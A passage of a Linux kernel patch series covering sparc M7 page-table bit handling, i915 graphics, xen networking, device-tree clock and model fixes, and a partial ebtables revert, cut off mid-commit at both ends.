pci_bus_slot_names(struct device_node *node, struct pci_bus *bus) { const struct pci_slot_names { @@ -1053,18 +1085,29 @@ static int __init of_pci_slot_init(void) while ((pbus = pci_find_next_bus(pbus)) != NULL) { struct device_node *node; + struct pci_dev *pdev; + + pdev = list_first_entry(&pbus->devices, struct pci_dev, + bus_list); - if (pbus->self) { - /* PCI->PCI bridge */ - node = pbus->self->dev.of_node; + if (pdev && pci_is_pcie(pdev)) { + pcie_bus_slot_names(pbus); } else { - struct pci_pbm_info *pbm = pbus->sysdata; - /* Host PCI controller */ - node = pbm->op->dev.of_node; - } + if (pbus->self) { + + /* PCI->PCI bridge */ + node = pbus->self->dev.of_node; + + } else { + struct pci_pbm_info *pbm = pbus->sysdata; - pci_bus_slot_names(node, pbus); + /* Host PCI controller */ + node = pbm->op->dev.of_node; + } + + pci_bus_slot_names(node, pbus); + } } return 0; From 494e5b6faeda1d1e830a13e10b3c7bc323f35d97 Mon Sep 17 00:00:00 2001 From: Khalid Aziz Date: Wed, 27 May 2015 10:00:46 -0600 Subject: [PATCH 548/872] sparc: Resolve conflict between sparc v9 and M7 on usage of bit 9 of TTE sparc: Resolve conflict between sparc v9 and M7 on usage of bit 9 of TTE Bit 9 of TTE is CV (Cacheable in V-cache) on sparc v9 processor while the same bit 9 is MCDE (Memory Corruption Detection Enable) on M7 processor. This creates a conflicting usage of the same bit. Kernel sets TTE.cv bit on all pages for sun4v architecture which works well for sparc v9 but enables memory corruption detection on M7 processor which is not the intent. This patch adds code to determine if kernel is running on M7 processor and takes steps to not enable memory corruption detection in TTE erroneously. Signed-off-by: Khalid Aziz Signed-off-by: David S. 
Miller --- arch/sparc/include/asm/pgtable_64.h | 22 ++++++++- arch/sparc/include/asm/trap_block.h | 2 + arch/sparc/kernel/entry.h | 2 + arch/sparc/kernel/setup_64.c | 21 ++++++++ arch/sparc/kernel/vmlinux.lds.S | 5 ++ arch/sparc/mm/init_64.c | 74 +++++++++++++++++++++-------- 6 files changed, 104 insertions(+), 22 deletions(-) diff --git a/arch/sparc/include/asm/pgtable_64.h b/arch/sparc/include/asm/pgtable_64.h index dc165ebdf05a..2a52c91d2c8a 100644 --- a/arch/sparc/include/asm/pgtable_64.h +++ b/arch/sparc/include/asm/pgtable_64.h @@ -308,12 +308,26 @@ static inline pte_t pte_modify(pte_t pte, pgprot_t prot) " sllx %1, 32, %1\n" " or %0, %1, %0\n" " .previous\n" + " .section .sun_m7_2insn_patch, \"ax\"\n" + " .word 661b\n" + " sethi %%uhi(%4), %1\n" + " sethi %%hi(%4), %0\n" + " .word 662b\n" + " or %1, %%ulo(%4), %1\n" + " or %0, %%lo(%4), %0\n" + " .word 663b\n" + " sllx %1, 32, %1\n" + " or %0, %1, %0\n" + " .previous\n" : "=r" (mask), "=r" (tmp) : "i" (_PAGE_PADDR_4U | _PAGE_MODIFIED_4U | _PAGE_ACCESSED_4U | _PAGE_CP_4U | _PAGE_CV_4U | _PAGE_E_4U | _PAGE_SPECIAL | _PAGE_PMD_HUGE | _PAGE_SZALL_4U), "i" (_PAGE_PADDR_4V | _PAGE_MODIFIED_4V | _PAGE_ACCESSED_4V | _PAGE_CP_4V | _PAGE_CV_4V | _PAGE_E_4V | + _PAGE_SPECIAL | _PAGE_PMD_HUGE | _PAGE_SZALL_4V), + "i" (_PAGE_PADDR_4V | _PAGE_MODIFIED_4V | _PAGE_ACCESSED_4V | + _PAGE_CP_4V | _PAGE_E_4V | _PAGE_SPECIAL | _PAGE_PMD_HUGE | _PAGE_SZALL_4V)); return __pte((pte_val(pte) & mask) | (pgprot_val(prot) & ~mask)); @@ -342,9 +356,15 @@ static inline pgprot_t pgprot_noncached(pgprot_t prot) " andn %0, %4, %0\n" " or %0, %5, %0\n" " .previous\n" + " .section .sun_m7_2insn_patch, \"ax\"\n" + " .word 661b\n" + " andn %0, %6, %0\n" + " or %0, %5, %0\n" + " .previous\n" : "=r" (val) : "0" (val), "i" (_PAGE_CP_4U | _PAGE_CV_4U), "i" (_PAGE_E_4U), - "i" (_PAGE_CP_4V | _PAGE_CV_4V), "i" (_PAGE_E_4V)); + "i" (_PAGE_CP_4V | _PAGE_CV_4V), "i" (_PAGE_E_4V), + "i" (_PAGE_CP_4V)); return __pgprot(val); } diff --git a/arch/sparc/include/asm/trap_block.h b/arch/sparc/include/asm/trap_block.h index 6fd4436d32f0..ec9c04de3664 100644 --- a/arch/sparc/include/asm/trap_block.h +++ b/arch/sparc/include/asm/trap_block.h @@ -79,6 +79,8 @@ struct sun4v_2insn_patch_entry { }; extern struct sun4v_2insn_patch_entry __sun4v_2insn_patch, __sun4v_2insn_patch_end; +extern struct sun4v_2insn_patch_entry __sun_m7_2insn_patch, + __sun_m7_2insn_patch_end; #endif /* !(__ASSEMBLY__) */ diff --git a/arch/sparc/kernel/entry.h b/arch/sparc/kernel/entry.h index 07cc49e541f4..0f679421b468 100644 --- a/arch/sparc/kernel/entry.h +++ b/arch/sparc/kernel/entry.h @@ -69,6 +69,8 @@ void sun4v_patch_1insn_range(struct sun4v_1insn_patch_entry *, struct sun4v_1insn_patch_entry *); void sun4v_patch_2insn_range(struct sun4v_2insn_patch_entry *, struct sun4v_2insn_patch_entry *); +void sun_m7_patch_2insn_range(struct sun4v_2insn_patch_entry *, + struct sun4v_2insn_patch_entry *); extern unsigned int dcache_parity_tl1_occurred; extern unsigned int icache_parity_tl1_occurred; diff --git a/arch/sparc/kernel/setup_64.c b/arch/sparc/kernel/setup_64.c index c38d19fc27ba..f7b261749383 100644 --- a/arch/sparc/kernel/setup_64.c +++ b/arch/sparc/kernel/setup_64.c @@ -255,6 +255,24 @@ void sun4v_patch_2insn_range(struct sun4v_2insn_patch_entry *start, } } +void sun_m7_patch_2insn_range(struct sun4v_2insn_patch_entry *start, + struct sun4v_2insn_patch_entry *end) +{ + while (start < end) { + unsigned long addr = start->addr; + + *(unsigned int *) (addr + 0) = start->insns[0]; + wmb(); + __asm__ 
__volatile__("flush %0" : : "r" (addr + 0)); + + *(unsigned int *) (addr + 4) = start->insns[1]; + wmb(); + __asm__ __volatile__("flush %0" : : "r" (addr + 4)); + + start++; + } +} + static void __init sun4v_patch(void) { extern void sun4v_hvapi_init(void); @@ -267,6 +285,9 @@ static void __init sun4v_patch(void) sun4v_patch_2insn_range(&__sun4v_2insn_patch, &__sun4v_2insn_patch_end); + if (sun4v_chip_type == SUN4V_CHIP_SPARC_M7) + sun_m7_patch_2insn_range(&__sun_m7_2insn_patch, + &__sun_m7_2insn_patch_end); sun4v_hvapi_init(); } diff --git a/arch/sparc/kernel/vmlinux.lds.S b/arch/sparc/kernel/vmlinux.lds.S index 09243057cb0b..f1a2f688b28a 100644 --- a/arch/sparc/kernel/vmlinux.lds.S +++ b/arch/sparc/kernel/vmlinux.lds.S @@ -138,6 +138,11 @@ SECTIONS *(.pause_3insn_patch) __pause_3insn_patch_end = .; } + .sun_m7_2insn_patch : { + __sun_m7_2insn_patch = .; + *(.sun_m7_2insn_patch) + __sun_m7_2insn_patch_end = .; + } PERCPU_SECTION(SMP_CACHE_BYTES) . = ALIGN(PAGE_SIZE); diff --git a/arch/sparc/mm/init_64.c b/arch/sparc/mm/init_64.c index 4ca0d6ba5ec8..559cb744112c 100644 --- a/arch/sparc/mm/init_64.c +++ b/arch/sparc/mm/init_64.c @@ -54,6 +54,7 @@ #include "init_64.h" unsigned long kern_linear_pte_xor[4] __read_mostly; +static unsigned long page_cache4v_flag; /* A bitmap, two bits for every 256MB of physical memory. These two * bits determine what page size we use for kernel linear @@ -1909,11 +1910,24 @@ static void __init sun4u_linear_pte_xor_finalize(void) static void __init sun4v_linear_pte_xor_finalize(void) { + unsigned long pagecv_flag; + + /* Bit 9 of TTE is no longer CV bit on M7 processor and it instead + * enables MCD error. Do not set bit 9 on M7 processor. + */ + switch (sun4v_chip_type) { + case SUN4V_CHIP_SPARC_M7: + pagecv_flag = 0x00; + break; + default: + pagecv_flag = _PAGE_CV_4V; + break; + } #ifndef CONFIG_DEBUG_PAGEALLOC if (cpu_pgsz_mask & HV_PGSZ_MASK_256MB) { kern_linear_pte_xor[1] = (_PAGE_VALID | _PAGE_SZ256MB_4V) ^ PAGE_OFFSET; - kern_linear_pte_xor[1] |= (_PAGE_CP_4V | _PAGE_CV_4V | + kern_linear_pte_xor[1] |= (_PAGE_CP_4V | pagecv_flag | _PAGE_P_4V | _PAGE_W_4V); } else { kern_linear_pte_xor[1] = kern_linear_pte_xor[0]; @@ -1922,7 +1936,7 @@ static void __init sun4v_linear_pte_xor_finalize(void) if (cpu_pgsz_mask & HV_PGSZ_MASK_2GB) { kern_linear_pte_xor[2] = (_PAGE_VALID | _PAGE_SZ2GB_4V) ^ PAGE_OFFSET; - kern_linear_pte_xor[2] |= (_PAGE_CP_4V | _PAGE_CV_4V | + kern_linear_pte_xor[2] |= (_PAGE_CP_4V | pagecv_flag | _PAGE_P_4V | _PAGE_W_4V); } else { kern_linear_pte_xor[2] = kern_linear_pte_xor[1]; @@ -1931,7 +1945,7 @@ static void __init sun4v_linear_pte_xor_finalize(void) if (cpu_pgsz_mask & HV_PGSZ_MASK_16GB) { kern_linear_pte_xor[3] = (_PAGE_VALID | _PAGE_SZ16GB_4V) ^ PAGE_OFFSET; - kern_linear_pte_xor[3] |= (_PAGE_CP_4V | _PAGE_CV_4V | + kern_linear_pte_xor[3] |= (_PAGE_CP_4V | pagecv_flag | _PAGE_P_4V | _PAGE_W_4V); } else { kern_linear_pte_xor[3] = kern_linear_pte_xor[2]; @@ -1958,6 +1972,13 @@ static phys_addr_t __init available_memory(void) return available; } +#define _PAGE_CACHE_4U (_PAGE_CP_4U | _PAGE_CV_4U) +#define _PAGE_CACHE_4V (_PAGE_CP_4V | _PAGE_CV_4V) +#define __DIRTY_BITS_4U (_PAGE_MODIFIED_4U | _PAGE_WRITE_4U | _PAGE_W_4U) +#define __DIRTY_BITS_4V (_PAGE_MODIFIED_4V | _PAGE_WRITE_4V | _PAGE_W_4V) +#define __ACCESS_BITS_4U (_PAGE_ACCESSED_4U | _PAGE_READ_4U | _PAGE_R) +#define __ACCESS_BITS_4V (_PAGE_ACCESSED_4V | _PAGE_READ_4V | _PAGE_R) + /* We need to exclude reserved regions. This exclusion will include * vmlinux and initrd. 
To be more precise the initrd size could be used to * compute a new lower limit because it is freed later during initialization. @@ -2034,6 +2055,25 @@ void __init paging_init(void) memset(swapper_4m_tsb, 0x40, sizeof(swapper_4m_tsb)); #endif + /* TTE.cv bit on sparc v9 occupies the same position as TTE.mcde + * bit on M7 processor. This is a conflicting usage of the same + * bit. Enabling TTE.cv on M7 would turn on Memory Corruption + * Detection error on all pages and this will lead to problems + * later. Kernel does not run with MCD enabled and hence rest + * of the required steps to fully configure memory corruption + * detection are not taken. We need to ensure TTE.mcde is not + * set on M7 processor. Compute the value of cacheability + * flag for use later taking this into consideration. + */ + switch (sun4v_chip_type) { + case SUN4V_CHIP_SPARC_M7: + page_cache4v_flag = _PAGE_CP_4V; + break; + default: + page_cache4v_flag = _PAGE_CACHE_4V; + break; + } + if (tlb_type == hypervisor) sun4v_pgprot_init(); else @@ -2274,13 +2314,6 @@ void free_initrd_mem(unsigned long start, unsigned long end) } #endif -#define _PAGE_CACHE_4U (_PAGE_CP_4U | _PAGE_CV_4U) -#define _PAGE_CACHE_4V (_PAGE_CP_4V | _PAGE_CV_4V) -#define __DIRTY_BITS_4U (_PAGE_MODIFIED_4U | _PAGE_WRITE_4U | _PAGE_W_4U) -#define __DIRTY_BITS_4V (_PAGE_MODIFIED_4V | _PAGE_WRITE_4V | _PAGE_W_4V) -#define __ACCESS_BITS_4U (_PAGE_ACCESSED_4U | _PAGE_READ_4U | _PAGE_R) -#define __ACCESS_BITS_4V (_PAGE_ACCESSED_4V | _PAGE_READ_4V | _PAGE_R) - pgprot_t PAGE_KERNEL __read_mostly; EXPORT_SYMBOL(PAGE_KERNEL); @@ -2312,8 +2345,7 @@ int __meminit vmemmap_populate(unsigned long vstart, unsigned long vend, _PAGE_P_4U | _PAGE_W_4U); if (tlb_type == hypervisor) pte_base = (_PAGE_VALID | _PAGE_SZ4MB_4V | - _PAGE_CP_4V | _PAGE_CV_4V | - _PAGE_P_4V | _PAGE_W_4V); + page_cache4v_flag | _PAGE_P_4V | _PAGE_W_4V); pte_base |= _PAGE_PMD_HUGE; @@ -2450,14 +2482,14 @@ static void __init sun4v_pgprot_init(void) int i; PAGE_KERNEL = __pgprot (_PAGE_PRESENT_4V | _PAGE_VALID | - _PAGE_CACHE_4V | _PAGE_P_4V | + page_cache4v_flag | _PAGE_P_4V | __ACCESS_BITS_4V | __DIRTY_BITS_4V | _PAGE_EXEC_4V); PAGE_KERNEL_LOCKED = PAGE_KERNEL; _PAGE_IE = _PAGE_IE_4V; _PAGE_E = _PAGE_E_4V; - _PAGE_CACHE = _PAGE_CACHE_4V; + _PAGE_CACHE = page_cache4v_flag; #ifdef CONFIG_DEBUG_PAGEALLOC kern_linear_pte_xor[0] = _PAGE_VALID ^ PAGE_OFFSET; @@ -2465,8 +2497,8 @@ static void __init sun4v_pgprot_init(void) kern_linear_pte_xor[0] = (_PAGE_VALID | _PAGE_SZ4MB_4V) ^ PAGE_OFFSET; #endif - kern_linear_pte_xor[0] |= (_PAGE_CP_4V | _PAGE_CV_4V | - _PAGE_P_4V | _PAGE_W_4V); + kern_linear_pte_xor[0] |= (page_cache4v_flag | _PAGE_P_4V | + _PAGE_W_4V); for (i = 1; i < 4; i++) kern_linear_pte_xor[i] = kern_linear_pte_xor[0]; @@ -2479,12 +2511,12 @@ static void __init sun4v_pgprot_init(void) _PAGE_SZ4MB_4V | _PAGE_SZ512K_4V | _PAGE_SZ64K_4V | _PAGE_SZ8K_4V); - page_none = _PAGE_PRESENT_4V | _PAGE_ACCESSED_4V | _PAGE_CACHE_4V; - page_shared = (_PAGE_VALID | _PAGE_PRESENT_4V | _PAGE_CACHE_4V | + page_none = _PAGE_PRESENT_4V | _PAGE_ACCESSED_4V | page_cache4v_flag; + page_shared = (_PAGE_VALID | _PAGE_PRESENT_4V | page_cache4v_flag | __ACCESS_BITS_4V | _PAGE_WRITE_4V | _PAGE_EXEC_4V); - page_copy = (_PAGE_VALID | _PAGE_PRESENT_4V | _PAGE_CACHE_4V | + page_copy = (_PAGE_VALID | _PAGE_PRESENT_4V | page_cache4v_flag | __ACCESS_BITS_4V | _PAGE_EXEC_4V); - page_readonly = (_PAGE_VALID | _PAGE_PRESENT_4V | _PAGE_CACHE_4V | + page_readonly = (_PAGE_VALID | _PAGE_PRESENT_4V | page_cache4v_flag | 
__ACCESS_BITS_4V | _PAGE_EXEC_4V); page_exec_bit = _PAGE_EXEC_4V; @@ -2542,7 +2574,7 @@ static unsigned long kern_large_tte(unsigned long paddr) _PAGE_EXEC_4U | _PAGE_L_4U | _PAGE_W_4U); if (tlb_type == hypervisor) val = (_PAGE_VALID | _PAGE_SZ4MB_4V | - _PAGE_CP_4V | _PAGE_CV_4V | _PAGE_P_4V | + page_cache4v_flag | _PAGE_P_4V | _PAGE_EXEC_4V | _PAGE_W_4V); return val | paddr; From 493be55ac3d81f9c32832237288eb397a9993d5d Mon Sep 17 00:00:00 2001 From: Vaishali Thakkar Date: Mon, 1 Jun 2015 10:28:37 +0530 Subject: [PATCH 549/872] xen-netfront: Use setup_timer Use the timer API function setup_timer instead of structure field assignments to initialize a timer. A simplified version of the Coccinelle semantic patch that performs this transformation is as follows: @change@ expression e, func, da; @@ -init_timer (&e); +setup_timer (&e, func, da); -e.data = da; -e.function = func; Signed-off-by: Vaishali Thakkar Signed-off-by: David S. Miller --- drivers/net/xen-netfront.c | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/drivers/net/xen-netfront.c b/drivers/net/xen-netfront.c index 3f45afd4382e..10a087a0ba35 100644 --- a/drivers/net/xen-netfront.c +++ b/drivers/net/xen-netfront.c @@ -1560,9 +1560,8 @@ static int xennet_init_queue(struct netfront_queue *queue) spin_lock_init(&queue->tx_lock); spin_lock_init(&queue->rx_lock); - init_timer(&queue->rx_refill_timer); - queue->rx_refill_timer.data = (unsigned long)queue; - queue->rx_refill_timer.function = rx_refill_timeout; + setup_timer(&queue->rx_refill_timer, rx_refill_timeout, + (unsigned long)queue); snprintf(queue->name, sizeof(queue->name), "%s-q%u", queue->info->netdev->name, queue->id); From e058c945e03a629c99606452a6931f632dd28903 Mon Sep 17 00:00:00 2001 From: Jim Bride Date: Wed, 27 May 2015 10:21:48 -0700 Subject: [PATCH 550/872] drm/i915/hsw: Fix workaround for server AUX channel clock divisor According to the HSW b-spec we need to try clock divisors of 63 and 72, each 3 or more times, when attempting DP AUX channel communication on a server chipset. This actually wasn't happening due to a short-circuit that only checked the DP_AUX_CH_CTL_DONE bit in status rather than checking that the operation was done and that DP_AUX_CH_CTL_TIME_OUT_ERROR was not set. [v2] Implemented alternate solution suggested by Jani Nikula. Cc: stable@vger.kernel.org Signed-off-by: Jim Bride Signed-off-by: Jani Nikula --- drivers/gpu/drm/i915/intel_dp.c | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/drivers/gpu/drm/i915/intel_dp.c b/drivers/gpu/drm/i915/intel_dp.c index f27346e907b1..d714a4b5711e 100644 --- a/drivers/gpu/drm/i915/intel_dp.c +++ b/drivers/gpu/drm/i915/intel_dp.c @@ -880,10 +880,8 @@ intel_dp_aux_ch(struct intel_dp *intel_dp, DP_AUX_CH_CTL_RECEIVE_ERROR)) continue; if (status & DP_AUX_CH_CTL_DONE) - break; + goto done; } - if (status & DP_AUX_CH_CTL_DONE) - break; } if ((status & DP_AUX_CH_CTL_DONE) == 0) { @@ -892,6 +890,7 @@ intel_dp_aux_ch(struct intel_dp *intel_dp, goto out; } +done: /* Check for timeout or receive error. 
* Timeouts occur when the sink is not connected */ From 0aedb1626566efd72b369c01992ee7413c82a0c5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Ville=20Syrj=C3=A4l=C3=A4?= Date: Thu, 28 May 2015 18:32:36 +0300 Subject: [PATCH 551/872] drm/i915: Don't skip request retirement if the active list is empty MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Apparently we can have requests even though the active list is empty, so do the request retirement regardless of whether there's anything on the active list. The way it happened here is that during suspend intel_ring_idle() notices the olr hanging around and then proceeds to get rid of it by adding a request. However, since there was nothing on the active lists, i915_gem_retire_requests() didn't clean those up, and so the idle work never runs, and we leave the GPU "busy" during suspend resulting in a WARN later. Signed-off-by: Ville Syrjälä Reviewed-by: Chris Wilson Cc: stable@vger.kernel.org Signed-off-by: Jani Nikula --- drivers/gpu/drm/i915/i915_gem.c | 3 --- 1 file changed, 3 deletions(-) diff --git a/drivers/gpu/drm/i915/i915_gem.c b/drivers/gpu/drm/i915/i915_gem.c index 53394f998a1f..851b585987f9 100644 --- a/drivers/gpu/drm/i915/i915_gem.c +++ b/drivers/gpu/drm/i915/i915_gem.c @@ -2656,9 +2656,6 @@ void i915_gem_reset(struct drm_device *dev) void i915_gem_retire_requests_ring(struct intel_engine_cs *ring) { - if (list_empty(&ring->request_list)) - return; - WARN_ON(i915_verify_lists(ring->dev)); /* Retire requests first as we use it above for the early return. From 9dd6f1c166bc6e7b582f6203f2dc023ec65e3ed5 Mon Sep 17 00:00:00 2001 From: Jonas Gorski Date: Mon, 25 May 2015 19:53:54 +0200 Subject: [PATCH 552/872] MIPS: ralink: Fix clearing the illegal access interrupt Due to a typo the illegal access interrupt is never cleared by the interrupt handler, causing an effective deadlock on the first illegal access. This was broken since the code was introduced in 5433acd81e87 ("MIPS: ralink: add illegal access driver"), but only exposed when the Kconfig symbol was added, thus enabling the code. Cc: [3.18+] Fixes: a7b7aad383c ("MIPS: ralink: add missing symbol for RALINK_ILL_ACC") Signed-off-by: Jonas Gorski Cc: linux-mips@linux-mips.org Cc: John Crispin Patchwork: https://patchwork.linux-mips.org/patch/10172/ Signed-off-by: Ralf Baechle --- arch/mips/ralink/ill_acc.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/mips/ralink/ill_acc.c b/arch/mips/ralink/ill_acc.c index e20b02e3ae28..e10d10b9e82a 100644 --- a/arch/mips/ralink/ill_acc.c +++ b/arch/mips/ralink/ill_acc.c @@ -41,7 +41,7 @@ static irqreturn_t ill_acc_irq_handler(int irq, void *_priv) addr, (type >> ILL_ACC_OFF_S) & ILL_ACC_OFF_M, type & ILL_ACC_LEN_M); - rt_memc_w32(REG_ILL_ACC_TYPE, REG_ILL_ACC_TYPE); + rt_memc_w32(ILL_INT_STATUS, REG_ILL_ACC_TYPE); return IRQ_HANDLED; } From 692ef3ee36833b6098a352c079d3cea8fc6ed3ef Mon Sep 17 00:00:00 2001 From: Yingjoe Chen Date: Fri, 15 May 2015 23:13:16 +0800 Subject: [PATCH 553/872] arm64: dts: mt8173-evb: fix model name Model name in mt8173-evb.dts doesn't follow dts convention (it should be a human-readable model name). Fix it.
Fixes: b3a372484157 ("arm64: dts: Add mediatek MT8173 SoC and evaluation board dts and Makefile") Cc: # v4.0+ Signed-off-by: Yingjoe Chen Signed-off-by: Matthias Brugger --- arch/arm64/boot/dts/mediatek/mt8173-evb.dts | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/arch/arm64/boot/dts/mediatek/mt8173-evb.dts b/arch/arm64/boot/dts/mediatek/mt8173-evb.dts index 43d54017b779..d0ab012fa379 100644 --- a/arch/arm64/boot/dts/mediatek/mt8173-evb.dts +++ b/arch/arm64/boot/dts/mediatek/mt8173-evb.dts @@ -16,7 +16,8 @@ #include "mt8173.dtsi" / { - model = "mediatek,mt8173-evb"; + model = "MediaTek MT8173 evaluation board"; + compatible = "mediatek,mt8173-evb", "mediatek,mt8173"; aliases { serial0 = &uart0; From 8a7b19d8b542b87bccc3eaaf81dcc90a5ca48aea Mon Sep 17 00:00:00 2001 From: Mikko Rapeli Date: Sat, 30 May 2015 17:39:25 +0200 Subject: [PATCH 554/872] include/uapi/linux/virtio_balloon.h: include linux/virtio_types.h MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Fixes userspace compilation error: error: unknown type name ‘__virtio16’ __virtio16 tag; Signed-off-by: Mikko Rapeli Signed-off-by: Michael S. Tsirkin --- include/uapi/linux/virtio_balloon.h | 1 + 1 file changed, 1 insertion(+) diff --git a/include/uapi/linux/virtio_balloon.h b/include/uapi/linux/virtio_balloon.h index 984169a819ee..d7f1cbc3766c 100644 --- a/include/uapi/linux/virtio_balloon.h +++ b/include/uapi/linux/virtio_balloon.h @@ -26,6 +26,7 @@ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #include +#include #include #include From b33558c906bf330336b16dc4598fecee66e48a57 Mon Sep 17 00:00:00 2001 From: Tero Kristo Date: Mon, 1 Jun 2015 18:30:27 +0300 Subject: [PATCH 555/872] ARM: dts: AM35xx: fix system control module clocks New system control module layout for omap3 overlooked parts of the am35xx configuration. Basically the am35xx clocks were not converted to use the changed offsets, which caused weird boot warnings. The errors were not fatal so far, so they were not caught earlier. Fixed by applying the proper offsets for the AM35xx scm clocks. 
Fixes: b8845074cf ("ARM: dts: omap3: add minimal l4 bus layout with...") Signed-off-by: Tero Kristo Reported-by: Jeroen Hofstee Cc: Paul Walmsley Tested-by: Jeroen Hofstee Signed-off-by: Tony Lindgren --- arch/arm/boot/dts/am35xx-clocks.dtsi | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/arch/arm/boot/dts/am35xx-clocks.dtsi b/arch/arm/boot/dts/am35xx-clocks.dtsi index 518b8fde88b0..18cc826e9db5 100644 --- a/arch/arm/boot/dts/am35xx-clocks.dtsi +++ b/arch/arm/boot/dts/am35xx-clocks.dtsi @@ -12,7 +12,7 @@ #clock-cells = <0>; compatible = "ti,am35xx-gate-clock"; clocks = <&ipss_ick>; - reg = <0x059c>; + reg = <0x032c>; ti,bit-shift = <1>; }; @@ -20,7 +20,7 @@ #clock-cells = <0>; compatible = "ti,gate-clock"; clocks = <&rmii_ck>; - reg = <0x059c>; + reg = <0x032c>; ti,bit-shift = <9>; }; @@ -28,7 +28,7 @@ #clock-cells = <0>; compatible = "ti,am35xx-gate-clock"; clocks = <&ipss_ick>; - reg = <0x059c>; + reg = <0x032c>; ti,bit-shift = <2>; }; @@ -36,7 +36,7 @@ #clock-cells = <0>; compatible = "ti,gate-clock"; clocks = <&pclk_ck>; - reg = <0x059c>; + reg = <0x032c>; ti,bit-shift = <10>; }; @@ -44,7 +44,7 @@ #clock-cells = <0>; compatible = "ti,am35xx-gate-clock"; clocks = <&ipss_ick>; - reg = <0x059c>; + reg = <0x032c>; ti,bit-shift = <0>; }; @@ -52,7 +52,7 @@ #clock-cells = <0>; compatible = "ti,gate-clock"; clocks = <&sys_ck>; - reg = <0x059c>; + reg = <0x032c>; ti,bit-shift = <8>; }; @@ -60,7 +60,7 @@ #clock-cells = <0>; compatible = "ti,am35xx-gate-clock"; clocks = <&sys_ck>; - reg = <0x059c>; + reg = <0x032c>; ti,bit-shift = <3>; }; }; From d26e2c9ffa385dd1b646f43c1397ba12af9ed431 Mon Sep 17 00:00:00 2001 From: Bernhard Thaler Date: Thu, 28 May 2015 10:26:18 +0200 Subject: [PATCH 556/872] Revert "netfilter: ensure number of counters is >0 in do_replace()" This partially reverts commit 1086bbe97a07 ("netfilter: ensure number of counters is >0 in do_replace()") in net/bridge/netfilter/ebtables.c. Setting rules with ebtables does not work any more with 1086bbe97a07 place. There is an error message and no rules set in the end. e.g. ~# ebtables -t nat -A POSTROUTING --src 12:34:56:78:9a:bc -j DROP Unable to update the kernel. Two possible causes: 1. Multiple ebtables programs were executing simultaneously. The ebtables userspace tool doesn't by default support multiple ebtables programs running Reverting the ebtables part of 1086bbe97a07 makes this work again. 
Signed-off-by: Bernhard Thaler Signed-off-by: Pablo Neira Ayuso --- net/bridge/netfilter/ebtables.c | 4 ---- 1 file changed, 4 deletions(-) diff --git a/net/bridge/netfilter/ebtables.c b/net/bridge/netfilter/ebtables.c index 24c7c96bf5f8..91180a7fc943 100644 --- a/net/bridge/netfilter/ebtables.c +++ b/net/bridge/netfilter/ebtables.c @@ -1117,8 +1117,6 @@ static int do_replace(struct net *net, const void __user *user, return -ENOMEM; if (tmp.num_counters >= INT_MAX / sizeof(struct ebt_counter)) return -ENOMEM; - if (tmp.num_counters == 0) - return -EINVAL; tmp.name[sizeof(tmp.name) - 1] = 0; @@ -2161,8 +2159,6 @@ static int compat_copy_ebt_replace_from_user(struct ebt_replace *repl, return -ENOMEM; if (tmp.num_counters >= INT_MAX / sizeof(struct ebt_counter)) return -ENOMEM; - if (tmp.num_counters == 0) - return -EINVAL; memcpy(repl, &tmp, offsetof(struct ebt_replace, hook_entry)); From dc5e7a811d3e57f2b10a4c4c90b175ce498a097d Mon Sep 17 00:00:00 2001 From: Ian Campbell Date: Mon, 1 Jun 2015 11:30:04 +0100 Subject: [PATCH 557/872] xen: netback: fix printf format string warning MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit drivers/net/xen-netback/netback.c: In function ‘xenvif_tx_build_gops’: drivers/net/xen-netback/netback.c:1253:8: warning: format ‘%lu’ expects argument of type ‘long unsigned int’, but argument 5 has type ‘int’ [-Wformat=] (txreq.offset&~PAGE_MASK) + txreq.size); ^ PAGE_MASK's type can vary by arch, so a cast is needed. Signed-off-by: Ian Campbell ---- v2: Cast to unsigned long, since PAGE_MASK can vary by arch. Acked-by: Wei Liu Signed-off-by: David S. Miller --- drivers/net/xen-netback/netback.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/xen-netback/netback.c b/drivers/net/xen-netback/netback.c index 4de46aa61d95..0d2594395ffb 100644 --- a/drivers/net/xen-netback/netback.c +++ b/drivers/net/xen-netback/netback.c @@ -1250,7 +1250,7 @@ static void xenvif_tx_build_gops(struct xenvif_queue *queue, netdev_err(queue->vif->dev, "txreq.offset: %x, size: %u, end: %lu\n", txreq.offset, txreq.size, - (txreq.offset&~PAGE_MASK) + txreq.size); + (unsigned long)(txreq.offset&~PAGE_MASK) + txreq.size); xenvif_fatal_tx_err(queue->vif); break; } From 31a418986a5852034d520a5bab546821ff1ccf3d Mon Sep 17 00:00:00 2001 From: Ian Campbell Date: Mon, 1 Jun 2015 11:30:24 +0100 Subject: [PATCH 558/872] xen: netback: read hotplug script once at start of day. When we come to tear things down in netback_remove() and generate the uevent it is possible that the xenstore directory has already been removed (details below). In such cases netback_uevent() won't be able to read the hotplug script and will write a xenstore error node. A recent change to the hypervisor exposed this race such that we now sometimes lose it (where apparently we didn't ever before). Instead read the hotplug script configuration during setup and use it for the lifetime of the backend device. The apparently more obvious fix of moving the transition to state=Closed in netback_remove() to after the uevent does not work because it is possible that we are already in state=Closed (in reaction to the guest having disconnected as it shutdown). Being already in Closed means the toolstack is at liberty to start tearing down the xenstore directories. In principal it might be possible to arrange to unregister the device sooner (e.g on transition to Closing) such that xenstore would still be there but this state machine is fragile and prone to anger... 
